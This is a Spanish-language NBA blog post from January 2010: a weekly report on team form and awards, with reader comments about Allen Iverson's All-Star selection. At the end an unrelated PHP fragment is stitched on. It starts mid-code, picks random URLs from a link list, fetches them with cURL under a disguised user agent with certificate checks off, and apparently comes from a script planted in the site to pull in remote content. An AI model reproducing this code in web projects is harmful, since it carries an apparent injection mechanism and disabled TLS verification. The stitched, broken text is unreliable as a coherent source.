Informe Semanal #13

25 de January de 2010 por TheDeerHunter

¿Porqué todos los jugones sonríen igual?

King James y sus Cavaliers son los que más motivos tienen para sonreir. Han batido a L.A. por 2ª vez consecutiva y para colmo les birlan el liderato de la liga. Son temibles… pero con Antawn podrían ser formidables.

Con Billups y Melo en la brecha los Nuggets ganan enteros. No le puede extrañar a nadie que el equipo que mejor juega de la liga sea sólido candidatosa la final de conferencia. ¿Cuántas acumula Billups?

Por último, los Jazz también han ganado todos sus partidos, aunque sólo han sido dos.

Ganarás el pan con el sudor de tu frente.

Algo está cambiando en la liga. Los gallos del Este parecen despertar. Orlando recupera cierto sentido en su juego. Atlanta no decae. Los Heat despiertan de un mal sueño. Incluso Raptors y Bulls se han disfrazado de equipos sólidos. Bucks y Sixers también firman un buen balance, aunque no pueden evitar quedarse cortados del pelotón de cabeza.

En el Oeste, Dallas no logra mantener el pulso a Denver. Portland se mantiene más cómodo de lo previsto en esa cuarta plaza, mientras que Suns y Houston aguantan a duras penas y Grizzlies, Thunder o Hornets no encuentran la manera de consolidar playoff. Los Warriors firman un 2-2 con medio equipo de la D-league. Complicadísimo mantener una regularidad en el Oeste.

Se dejaban llevar.

Lakers y Celtics atraviesan distintas fases de penalidades físicas. Parece que les ha pasado una apisonadora por encima y no hemos entrado todavía en febrero. Es de suponer que encontrarán la manera de recuperar fuerzas para esta fase decisiva que comienza.

Los Spurs, sin embargo, no pueden acudir a la excusa de las lesiones. En su caso estamos acostumbrados al relax pre all star… pero no tanto.

En los Clippers se nota que la motivación está pendiente de un hilo y los Knicks se llevaron anoche la paliza “dejarse llevar” de la temporada. Nada menos que 50 puntitos.

Pistons, Pacers, Wizards… bastante tienen con salir a la cancha cada noche.

El carabasas club.

Los Nets marcan un 7% de victorias/derrotas que un servidor no había visto en la vida. Tan solo ganarían 7 partidos de cada 100 (si llega). En este caso tienen 82 para ganar, ¿cuántos? El récord puede ser insuperable.

Los Kings también se han convertido en un despropósito. Qué lástima, con lo bien que jugaron por momentos. El último gran partido que les vimos fue precisamente contra L.A. El camino parece claro. Más en la línea de traspasar a Martin que de no darle ni un minuto a Sergio.

Finalmente los Wolves mantienen su bajo nivel de juego destacados en la cola del Oeste.

PREMIOS SEMANALES

MVP: Acostumbrados a sus fenomenales actuaciones a veces caemos en el “costumbrismo” pero no podemos dejar de otorgar a Lebron James esta semana el título de MVP. 34 puntos, 7.6 rebotes, 10.6 asistencias y 3 victorias consecutivas le contemplan.

Rookie: Ante el mal momento de los Kings y la irregularidad de Jennigs parece llegar el momento de un rookie que está pasando sin hacer mucho ruído por la liga pero que está cuajando un gran papel en un equipo que le viene como anillo al dedo. Stephen Curry se ha ido a los 24.5 puntos, 5 rebotes y 5.25 asistencias por partidos. Un jugón en estado puro.

Sorpresa: Cartier Martin, Anthony Tolliver, Chris Hunter, Devean George... El equipo que ha tenido que montar Don Nelson esta semana debido a las lesiones es de órdago pero los resultados no han sido tan decepcionante como cabían esperar. ¿La suerte le sonríe o es un iluminado?

Decepción: En el último momento Steve Nash le “robó” el puesto a T-Mac en el quinteto del Oeste pero nadie ha podido evitar que Allen Iverson salga en la partida del partido de las estrellas. Un insulto a loss jugadores que se merecen el premio mucho más que él.

Comenta

7 comentarios a esta entrada

  1. sayim dice:
    #1

    Estupendo informe, como siempre. Muchas gracias por la pagina que nos ayuda a muchos a entender un poco lo que rodea a la NBA

    Un saludo

      Citar

  2. Love Denise dice:
    #2

    sí, muy buen informe, no pude ver nada de basket ultimamente, y gracias a estas magnificas crónicas uno se entera de todo. Seguid así.

      Citar

  3. pcerezo dice:
    #3

    Lo de Iverson en el quinteto titular es ganas de tocar las narices.
    A mí ya no me apetece verle…en cambio con TMac me pasa lo contrario, estoy deseando que vuelva.

    Los Rockets se desinflan…y los Grizzlies veremos como evolucionan en el próximo mes…si consiguen mantener regularidad pueden ser luchar por 7 u 8 plaza.

    Pablo

      Citar

  4. flavsgordon dice:
    #4

    Tampoco estoy seguro de que Jordan tuviera números de all-star con 40 tacos en los magos de washington y ahí estuvo… yo creo que el hecho de que Iverson esté de titular en el all star ha sido para darle, tras su vuelta a casa en philadelphia, un pequeño homenaje al que fue MVP del 2001 arrastrando a sus 76ers a las finales de ese mismo año. No sé, no creo que esta selección haga daño a nadie.

      Citar

  5. TheDeerHunter dice:
    #5

    pues el señor M.J. con 40 tacos en los Wizards tuvo medias de más de 20 puntos, 6 rebotes y casi 5 asistencias

    Yo sí estoy de acuerdo con que se le reconozca la carrera de Iverson y se le despida con un all-star, lo que no estoy de acuerdo es en que sea titular ¿a quien puede fastidiar esto?? pues a quien se quede fuera, lógicamente

      Citar

  6. Txusma dice:
    #6

    Si nos ponemos así habria que despedir también a gente como Ray Allen o Shaquille O’Neal, no?

      Citar

  7. TheDeerHunter dice:
    #7

    Se dijo que a Shaq ya se le despidió el año pasado (y de qué forma)… lo mismo que a Allen el anterior. Ambos se llevan un MVP del all-star a casa, de despedida. Y en algún caso de forma bastante olorosa.

    De todas formas estoy de acuerdo. Para mí es una lástima que Shaq o Ray Allen no puedan jugar el all-star de por vida.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>